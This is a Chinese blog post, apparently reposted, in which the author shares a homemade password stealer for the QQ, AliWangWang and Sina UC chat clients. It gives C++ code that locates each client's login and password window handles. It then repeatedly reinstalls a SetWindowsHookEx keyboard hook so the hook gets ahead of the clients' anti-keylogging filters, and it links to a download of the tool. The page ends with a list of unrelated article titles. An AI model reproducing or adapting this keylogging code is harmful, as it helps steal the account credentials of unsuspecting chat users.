QQ分析和密码获取,阿里旺旺分析和密码获取,新浪UC分析和密码获取,以及所有的UC端...请不要乱用,我可不负责
来源:互联网 发布:前海数据服务有限公司 编辑:程序博客网 时间:2024/04/29 11:43
今天逛了下黑客学院网站(自己无端端想看一下黑客),下载了几个月份的黑客防线PDF,看有没有自己想学的东西,谁知道看了后大部分都不了解,今日的黑客都匪夷所思~~汗。
谁知道在黑客防线2011年的1月PDF中看到了一篇非常有兴趣的文章:用户态突破QQ密码保护机制(一个杭州工程学院人写的,大神啊,大神,不膜拜,不行),盗取密码....于是看着写代码,真行。想当初自己也曾试过HOOK QQ,想盗取密码,但是失败告终..
学会了QQ的密码获取,那阿里旺旺,新浪UC..等等所有的垃圾保UC端还能远吗,于是几分钟内,其它的UC端一一给我获取了(小弟以前做过自动登录阿里旺旺,新浪UC的小工具)....Oh,原来是这么的简单。
下面分析一下代码:
一.关键之一是:获取它的用户名和密码句柄:
(1)QQ的句柄:
BOOL CSee_QQDlg::FindQQHwnd()
{
HwndQQ = ::FindWindowEx( NULL, NULL, "TXGuiFoundation", "QQ2010" );
if( HwndQQ )
{
HwndChild = ::GetWindow( HwndQQ, GW_CHILD );
HwndUserName = ::GetWindow( HwndChild, GW_HWNDFIRST );
HwndPassword = ::GetWindow( HwndChild, GW_HWNDLAST );
return TRUE;
}
else
{
return FALSE;
}
}
(2)阿里旺旺的句柄:
HwndWangWnag = ::FindWindowEx( NULL, NULL, "StandardFrame", "阿里旺旺2011" );
HwndChild=::FindWindowEx( HwndWangWnag,NULL,"StandardWindow","登录窗口");
if( HwndChild )
{
HwndUserName = ::FindWindowEx( HwndChild, NULL,"EditComponent",NULL);
HwndUserName = ::FindWindowEx( HwndChild, HwndUserName,"EditComponent",NULL);
HwndPassword=::FindWindowEx( HwndChild,NULL,"AliEdit",NULL);
HwndPassword=::FindWindowEx( HwndPassword,NULL,NULL, "");
HwndPassword=::FindWindowEx( HwndPassword,NULL,"ATL:Edit","");
return TRUE;
}
(3)新浪UC的句柄:
HwndUC = ::FindWindow( NULL, "新浪UC" );
HwndChild=::FindWindowEx( HwndUC, NULL, "#32770", NULL );
if( HwndChild )
{
HwndUserName = ::FindWindowEx( HwndChild, NULL, "ComboBox", NULL );
HwndUserName = ::FindWindowEx( HwndUserName, NULL, "Edit", NULL );
HwndPassword=::FindWindowEx( HwndChild, NULL, "Edit", NULL );
return TRUE;
}
(4)其它的自己来吧,Oh..
2.关键之二是:HOOK的方法:
采用SetWindowsHookEx,而且是不停的安装和卸载HOOK用定时器吧,这样可以防其UC端给先过滤掉正常的按键消息。
void CSee_QQDlg::OnTimer(UINT_PTR nIDEvent)
{
switch( nIDEvent )
{
case 1:
if( DeleteHook() )
if( SetHook() )
{
}
break;
default:
break;
}
CDialog::OnTimer(nIDEvent);
}
3.关键三是:可以HOOK按键了,但有些UC,像QQ就会发一些垃圾的按键消息,碍你的视线,这就需要你研究了,不过在《用户态突破QQ密码保护机制》已经帮你解决了,原来是这么复杂,死TX,而其它UC,则不会这样,好好容易获取密码。
4.关键四是:对用户按键的东西进行分析,已输出密码,不过自己没写这些,有兴趣写的朋友,发我一份啊。
下载地址:http://u.115.com/file/dn4iiy8a
最后还是要感谢黑客防线,感谢那个牛人。
- QQ分析和密码获取,阿里旺旺分析和密码获取,新浪UC分析和密码获取,以及所有的UC端...请不要乱用,我可不负责
- 新浪UC端自动登录小工具和分析UC端登录
- 简单逆向分析使用案例(5)--CrackMe_04.exe 获取用户名和密码
- DiscuzX3.2和UC 密码丢失的解决方法
- C# 获取身份验证的用户名和密码
- 【原创】获取网页中所有密码和发帖标题内容
- ios 利用钥匙串保存密码和获取密码
- 破解锁屏密码和获取Wifi密码
- 从cookie里获取用户名和密码,保存密码功能
- svn忘记密码怎么办?如何获取svn账号和密码?
- 获取WinNT/Win2k当前用户名和密码
- 使用PwDump和ophcrack获取系统密码
- Linux密码文件passwd和shadow分析
- 【Python】获取Chrome浏览器已保存的账号和密码
- python+cookielib实现批量利用账号和密码自动获取新浪微博登录cookie
- Android中可以做的两件坏事---破解锁屏密码和获取Wifi密码
- Android中可以做的两件坏事---破解锁屏密码和获取Wifi密码
- Android中可以做的两件坏事---破解锁屏密码和获取Wifi密码
- VBScript的PDF转换工具.9.处理目录和单个文件
- hashmap中元素进行升序排序
- 软件工程工作量估计
- VBScript的PDF转换工具.10.主函数
- 配置调用action的步骤以及注意事项
- QQ分析和密码获取,阿里旺旺分析和密码获取,新浪UC分析和密码获取,以及所有的UC端...请不要乱用,我可不负责
- HTML中,content="text/html; charset=gb2312";XML中 encoding="UTF-8"。其实都是指的 “程序员告诉别人,我的此html文档所使用的字符编码,但是
- land of lisp 1
- 希尔排序
- 写在工作之余(2011年5月)
- 进程间通信的方式及比较
- 禁用myeclipse indexes 及 优化myEclipse 启动速度(转)
- GXT ComboBox default value
- 命令ls的C语言实现